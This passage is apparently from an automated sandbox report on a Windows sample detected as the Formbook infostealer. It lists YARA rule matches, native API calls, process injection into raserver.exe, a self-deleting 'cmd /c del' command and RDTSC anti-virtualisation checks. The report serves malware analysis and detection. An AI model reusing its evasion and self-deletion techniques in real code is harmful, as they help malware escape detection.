          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B8280 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B8300 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B8222 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B83AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0040102E
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B8FB
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00408C6C
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00408C70
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B57A
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041C58A
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D21D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C50D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C76E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB8FB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A8C70
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A8C6C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BC58A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A2D88
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB57A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04C5B150 appears 32 times
          Source: pMbPS8nCm1.exe, 00000001.00000003.243940877.0000000002406000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe, 00000002.00000002.307872984.0000000000CBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe, 00000002.00000002.308207312.0000000000D89000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@13/5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_01
          Source: pMbPS8nCm1.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: pMbPS8nCm1.exeVirustotal: Detection: 26%
          Source: pMbPS8nCm1.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeFile read: C:\Users\user\Desktop\pMbPS8nCm1.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: Binary string: wntdll.pdbUGP source: pMbPS8nCm1.exe, 00000001.00000003.245067685.0000000002480000.00000004.00000001.sdmp, pMbPS8nCm1.exe, 00000002.00000002.306527493.0000000000A10000.00000040.00000001.sdmp, raserver.exe, 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pMbPS8nCm1.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeUnpacked PE file: 2.2.pMbPS8nCm1.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00415D38 pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A62F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B53FC push eax; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BC4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B5CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB41B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB412 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB47C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B5D38 pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B4D71 push ss; iretd
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000009A85F4 second address: 00000000009A85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000009A898E second address: 00000000009A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5164Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 4616Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
